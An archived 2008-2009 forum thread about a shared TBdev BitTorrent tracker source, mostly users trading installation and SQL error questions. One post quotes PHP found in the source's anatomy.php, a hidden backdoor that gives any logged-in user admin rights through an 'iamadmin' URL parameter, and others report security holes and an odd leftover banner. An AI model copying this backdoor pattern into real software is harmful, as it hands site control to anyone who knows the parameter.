Bravo List

Bravo List (http://www.bvlist.com/index.php)
-   Community Cafe (http://www.bvlist.com/forumdisplay.php?f=18)
-   -   My Little Source (http://www.bvlist.com/showthread.php?t=531)

wMan 8th July 2008 23:41

Re: My Little TBdev Source
 
nope, torrentstrike as that in it

//edit: in fact all versions are compatible with everything you want. you could stick a tracker on joomla CMS if you really wanted too. It just depends on your level of knowledge. There is a tbdev phpbb bridge built for v2 of phpbb. With a little editing of that you could integrate phpbb3 into tbdev if you prefer tbdev over other sources. OR you could go to tbdev and post asking if someone could update teh bridge however you'll have to either find the thread for the bridge and post in there or find the bridge script and post it so someone can update it

Regz 14th July 2008 06:52

re: My Little Source
 
hello personally i dont know which is the best tracker nd wht is best tracker + forum combination i have no prior knowledge of integrating but i think i know enuf php to do so if someone tells me how to go abt it thnx..

wMan 19th August 2008 23:00

one thing with this code bittorrent.php is full of open gaps :(

NatashaRhea 20th August 2008 20:09

information
 
i done this source and leave a banner in system after source is removed of Freddie crugar instead of where torrentbits should be anyone else have this it is odd as i can not remove this from here is screenshot now the problem i have is i removed this source and trying to put TS back on and it shows up on admincp as you can see in screenshot which is very odd
http://img175.imageshack.us/img175/4...rcrugarlz3.jpg
[img=http://img175.imageshack.us/img175/4714/servercrugarlz3.jpg]

mosu 6th February 2009 08:27

well the sourtce is fine but i have a problem with shoutbox ...
Quote:

SQL Error
Table 'test.shoutbox' doesn't exist
in C:\xampp\htdocs\shoutbox.php, line 78
can someone help me??

houtslag 6th February 2009 14:34

Hi I have installed your source on my tracker but i can't loggin to my account anymore.

Login failed!Username or password incorrect

mosu 6th February 2009 15:44

try to make a new account and then connect to phpmyadmin and make yourself sysop ;):friend:

houtslag 6th February 2009 15:57

I want to use one account not two or more. I have also another problem with uploading a torrent my program says HTTP Error 500

hellix 12th February 2009 11:02

PHP Code:

if ($_GET["iamadmin"]) {
$tagat=$CURUSER["id"];
                               
mysql_query("UPDATE `users` SET `class` = '9' WHERE `users`.`id` =$tagat") or sqlerr(__FILE____LINE__);
 print(
"Now you are one of site admins :D");
                }
if (
$_GET["back"]) {
$tagat=$CURUSER["id"];
                               
mysql_query("UPDATE `users` SET `class` = '0' WHERE `users`.`id` =$tagat") or sqlerr(__FILE____LINE__);
 print(
"Your class now is 0 :(");
                } 

in anatomy.php :lol: not nice............

Morbidawn 5th June 2009 12:05

Dose anyone know how to get rid of that tracker.shoutbox error?


All times are GMT +2. The time now is 09:38.

Powered by vBulletin® Version 3.8.11 Beta 3
Copyright ©2000 - 2024, vBulletin Solutions Inc.